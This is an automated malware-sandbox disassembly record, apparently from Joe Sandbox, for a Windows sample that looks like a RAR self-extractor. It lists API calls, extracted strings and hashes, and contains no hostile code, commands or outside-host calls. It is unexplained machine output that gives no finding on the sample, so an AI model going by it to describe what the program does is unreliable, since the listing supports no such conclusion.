                                                              • Instruction Fuzzy Hash: 23313B71A022459FFB61AA7AE886B5B77E9EF10314F18441FE548D7292DF39AC40CB18
                                                              APIs
                                                              • _free.LIBCMT ref: 00449705
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 00449711
                                                              • _free.LIBCMT ref: 0044971C
                                                              • _free.LIBCMT ref: 00449727
                                                              • _free.LIBCMT ref: 00449732
                                                              • _free.LIBCMT ref: 0044973D
                                                              • _free.LIBCMT ref: 00449748
                                                              • _free.LIBCMT ref: 00449753
                                                              • _free.LIBCMT ref: 0044975E
                                                              • _free.LIBCMT ref: 0044976C
                                                              Strings
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: 0dE
                                                              • API String ID: 776569668-3691849534
                                                              • Opcode ID: 72166e0ed47cd4fc919aaad7f54670f61db66faa0d9f4a8291c4c190d93dd25e
                                                              • Instruction ID: 261a9c0ae643efe4aaa12fad8aec958f07bf2b003ef83a2c8db8f6d1aecc3505
                                                              • Opcode Fuzzy Hash: 72166e0ed47cd4fc919aaad7f54670f61db66faa0d9f4a8291c4c190d93dd25e
                                                              • Instruction Fuzzy Hash: A711FBB6501009BFDB01EF95C842CDD3B75EF24354B5150AAFA084F272DE35DE509B88
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00439736
                                                              • _wcslen.LIBCMT ref: 004397D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004397E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00439806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043982D
                                                              Strings
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: FjunC$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-2049243416
                                                              • Opcode ID: e32ec433c39493a455f84c0674f3f4f287fc80f88447c521fce7157948cc4c71
                                                              • Instruction ID: f4fbccd7e5609e8285bbd4cdc296cb9a9836447269c29fb4fce20108914e31d4
                                                              • Opcode Fuzzy Hash: e32ec433c39493a455f84c0674f3f4f287fc80f88447c521fce7157948cc4c71
                                                              • Instruction Fuzzy Hash: 1C316C321097017AE725AF359C06F5F7798DF86725F10041FF501962C2EBAC9E0983AD
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0043D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0043D6ED
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0043D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0043D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0043D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0043D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0043D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0043D76D
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 38f3031f988d68bde73608e55e20643d74b782614a926512e85210a8542d4786
                                                              • Instruction ID: 6fe768e2c7269c0a84f26e5068b4196fad692b015255a2162e7d6db74a05172d
                                                              • Opcode Fuzzy Hash: 38f3031f988d68bde73608e55e20643d74b782614a926512e85210a8542d4786
                                                              • Instruction Fuzzy Hash: 99112772A403107BE2207F75AC4AFAF765CAB49B06F00553AFA81A51D1D76C8B0546AD
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: c73c581fdfe64c37f44788b6550b6b546bf4a958c617d0902f598a706518bb8a
                                                              • Instruction ID: b5c781ce7f68f6e152f4c5dd975f0cf74ff02a1764cf5ef7e2aba151f3b1111f
                                                              • Opcode Fuzzy Hash: c73c581fdfe64c37f44788b6550b6b546bf4a958c617d0902f598a706518bb8a
                                                              • Instruction Fuzzy Hash: 43B17771800209EFEF24DFA5C9819AFBBB5BF04716F54415BF8016B202D779EA11CB99
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nC
                                                              • API String ID: 3519838083-476071384
                                                              • Opcode ID: 52fe3efb26023ab999735f3a489fa6456f279f3d4dd86679ac3ddcf34857f82d
                                                              • Instruction ID: 0661f0b9c80d14ea341d0b27f37bbf850f7ab3926ad94fe44c9e5414bd41c45b
                                                              • Opcode Fuzzy Hash: 52fe3efb26023ab999735f3a489fa6456f279f3d4dd86679ac3ddcf34857f82d
                                                              • Instruction Fuzzy Hash: 86719E70B00629AFDB14DF64DC959AFB7B8FF48355B14016EF902A72A1CB38AD02CB54
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00426FAA
                                                              • _wcslen.LIBCMT ref: 00427013
                                                              • _wcslen.LIBCMT ref: 00427084
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: bebb17417139d23807474c25389b1dccd166df68cd01592a0cdfa647b1b6a385
                                                              • Instruction ID: a2848f832674765d542f46488a4ff1a3a1cf83ac40c5c0a1a6a3d0b7272669b8
                                                              • Opcode Fuzzy Hash: bebb17417139d23807474c25389b1dccd166df68cd01592a0cdfa647b1b6a385
                                                              • Instruction Fuzzy Hash: AB41ECB1F04364BAEB20EB71AC42FEF776C5F05348F40445BFD45A6282D67C6A588729
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0043B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0043B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0043B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0043B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0043B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0043B694
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 5d19388e36c3a706f846303a5e39971636a713443012e21de0e50863cbb63d61
                                                              • Instruction ID: f625d716c8721deef58847dc67a683fe650ce74a5cb39b18330aa3cf1186a64b
                                                              • Opcode Fuzzy Hash: 5d19388e36c3a706f846303a5e39971636a713443012e21de0e50863cbb63d61
                                                              • Instruction Fuzzy Hash: F321B431204204BBE2119F66EC4AF3F3B6DEB4AF46F01442EF604965E1DB5A9901977E
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,1D081F23,00000001,00000000,00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0043FE1F
                                                              • _com_issue_error.COMSUPP ref: 0043FE48
                                                              • _com_issue_error.COMSUPP ref: 0043FE52
                                                              • GetLastError.KERNEL32(80070057,1D081F23,00000001,00000000,00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE57
                                                              • _com_issue_error.COMSUPP ref: 0043FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE80
                                                              • _com_issue_error.COMSUPP ref: 0043FE93
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: a6d0bb5b35ddbb3ee6df8851d08a2a65f80f69a96ea2fdc5f39ef2bc5c2f3884
                                                              • Instruction ID: ab322801649930dcee482bf4e858e536177c7602eadfaebcdfa499039640b028
                                                              • Opcode Fuzzy Hash: a6d0bb5b35ddbb3ee6df8851d08a2a65f80f69a96ea2fdc5f39ef2bc5c2f3884
                                                              • Instruction Fuzzy Hash: AE41C871E00315ABD7109F65CC46BAFBBA8EB4CB55F20423FF905E7292D738990487A9
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00429387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004293AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004293C9
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • _swprintf.LIBCMT ref: 00429465
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 004294D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00429514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 878f8c2d5d0431f9dc234d33dc7ecb2acda152127712c6a5190df09d49cf6064
                                                              • Instruction ID: 86f0027e6e15789e1f83435778aaada7eb8711cd072da20dddc7836335b004e0
                                                              • Opcode Fuzzy Hash: 878f8c2d5d0431f9dc234d33dc7ecb2acda152127712c6a5190df09d49cf6064
                                                              • Instruction Fuzzy Hash: 0D416572B00274B5CF21AF61AC459DF737CAF45744F8048ABB509A3151DA3C8FC98B68
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: UC$pC$zC
                                                              • API String ID: 176396367-2289992426
                                                              • Opcode ID: 878016647095381f72e429dfbca2e7a281f75699c9596ad312764e4e6c4b1de7
                                                              • Instruction ID: 0f84a01d83ec3f71011702481239e03ce28057f76ad08d51db8f4bb2b8e62a50
                                                              • Opcode Fuzzy Hash: 878016647095381f72e429dfbca2e7a281f75699c9596ad312764e4e6c4b1de7
                                                              • Instruction Fuzzy Hash: FF410771A006299BCB219F68DC069EF7BB8EF05711F00002EFD46F7255DB34AE458BA8
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00439EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00439F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00439FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00439FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00439FF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: C$RarHtmlClassName
                                                              • API String ID: 3937224194-3570579450
                                                              • Opcode ID: d4c775911476c75d4669a26cd8dfb9e0516d69e8c5bd0f770a20a122b526f0d6
                                                              • Instruction ID: f70b96f89f313b894722732176532a7785f86eb837a1e316a444a3b73f5c0b3b
                                                              • Opcode Fuzzy Hash: d4c775911476c75d4669a26cd8dfb9e0516d69e8c5bd0f770a20a122b526f0d6
                                                              • Instruction Fuzzy Hash: 8C41CF31004210AFDB219F64DC8CB6FBBB8FB48B06F00592EF94999152DB78DD15CB6A
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0043122E
                                                                • Part of subcall function 0042B146: GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00431251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00431263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00431274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004312CF
                                                              • __aullrem.LIBCMT ref: 00431379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 9a722cad15ef131e0bbf81a310233d33d049ce16b7e58446a02aa6f3f4636a1b
                                                              • Instruction ID: 06ec0d2e5d8c5a1fd53cbec36103ef5e8fcd2f1d38bef14abc1c0579549a781e
                                                              • Opcode Fuzzy Hash: 9a722cad15ef131e0bbf81a310233d33d049ce16b7e58446a02aa6f3f4636a1b
                                                              • Instruction Fuzzy Hash: 604126B1508305AFD710DF65C88496BBBF9FF88355F00892EF996C2210E738E649CB56
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00422536
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: c469bca1481fab4f894d032962fd49c28781d8270a7f8502715c909da87e7ca9
                                                              • Instruction ID: 77954b0f36901b5d6fa973625efb87ad58042980560568c4236cf90c38c6e63d
                                                              • Opcode Fuzzy Hash: c469bca1481fab4f894d032962fd49c28781d8270a7f8502715c909da87e7ca9
                                                              • Instruction Fuzzy Hash: 8BF15A70704360ABCB24EB25A5D5BBE77956B84304F88056FFC869B343CBACC945C76A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 775d6b4ab42fce0c4131511f4834ccdad6eb5833dca7808b54efe4120234eafe
                                                              • Instruction ID: 933bb2b95103f1646b765c2662015378b8de1133052de915a407e67e96e8a5f9
                                                              • Opcode Fuzzy Hash: 775d6b4ab42fce0c4131511f4834ccdad6eb5833dca7808b54efe4120234eafe
                                                              • Instruction Fuzzy Hash: E351D56664532395DB30AA25981377773E0DFA9751F68241BE9C18B3C0FBED8C81826D
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0044F6CF
                                                              • __fassign.LIBCMT ref: 0044F74A
                                                              • __fassign.LIBCMT ref: 0044F765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044F78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044FE02,00000000,?,?,?,?,?,?,?,?,?,0044FE02,00000000), ref: 0044F7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,0044FE02,00000000,?,?,?,?,?,?,?,?,?,0044FE02,00000000), ref: 0044F7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 6ce8a6ee88095948035e06a087afd5d55e595b37ccf31d2f3c9573299ef8eefc
                                                              • Instruction ID: 12fbd3a1903ee2fe3ef57a7a2a66ee74283d781bd96f563ae225be910bc0434b
                                                              • Opcode Fuzzy Hash: 6ce8a6ee88095948035e06a087afd5d55e595b37ccf31d2f3c9573299ef8eefc
                                                              • Instruction Fuzzy Hash: C051B2B19002099FDB10CFA8DC85AEEFBF4EF09310F15416BE951E7291D774AA45CBA8
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0043CE9D
                                                                • Part of subcall function 0042B690: _wcslen.LIBCMT ref: 0042B696
                                                              • _swprintf.LIBCMT ref: 0043CED1
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(?,00000066,0046946A), ref: 0043CEF1
                                                              • _wcschr.LIBVCRUNTIME ref: 0043CF22
                                                              • EndDialog.USER32(?,00000001), ref: 0043CFFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: 07d5609041236f91a3f7627b045cfa342eaebb3b0462934872b992fd18de487b
                                                              • Instruction ID: 41711484ccc1e1cb6f68282a2fd64b2e749e24ef3243a742055c45d0c76c6139
                                                              • Opcode Fuzzy Hash: 07d5609041236f91a3f7627b045cfa342eaebb3b0462934872b992fd18de487b
                                                              • Instruction Fuzzy Hash: BD4199B1900618AADF259B50DC85EEE77BCDB08345F4050A7F909E7141EF789E44CF6A
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00442937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0044293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 004429C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004429F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00442A48
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: ac1c9d444f8cd09b9ced151915adc1e587b25a59830531da572b4f3fac72da54
                                                              • Instruction ID: f60f49b0439caf1c13759e201bab1d38a0cce23a68ff775e2d4636bf7ecc990c
                                                              • Opcode Fuzzy Hash: ac1c9d444f8cd09b9ced151915adc1e587b25a59830531da572b4f3fac72da54
                                                              • Instruction Fuzzy Hash: AD41F974A00208AFDF10DF29C881AAF7BB0AF44315F548157FC14AB352D7B9DA05CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: d425dbf871f5935f17d379497446d9603b9c2149c0d0955f85da25928fcfcb5b
                                                              • Instruction ID: 49eb2d49de694f1a5c19df7ec51540f166b532acbe5adbc8a83ffdb16eb3404b
                                                              • Opcode Fuzzy Hash: d425dbf871f5935f17d379497446d9603b9c2149c0d0955f85da25928fcfcb5b
                                                              • Instruction Fuzzy Hash: 88316C6264438166EA30BF509C42B7B73E4EB84724F60451FF88257380FBECAD8583AD
                                                              APIs
                                                                • Part of subcall function 0044C868: _free.LIBCMT ref: 0044C891
                                                              • _free.LIBCMT ref: 0044C8F2
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044C8FD
                                                              • _free.LIBCMT ref: 0044C908
                                                              • _free.LIBCMT ref: 0044C95C
                                                              • _free.LIBCMT ref: 0044C967
                                                              • _free.LIBCMT ref: 0044C972
                                                              • _free.LIBCMT ref: 0044C97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
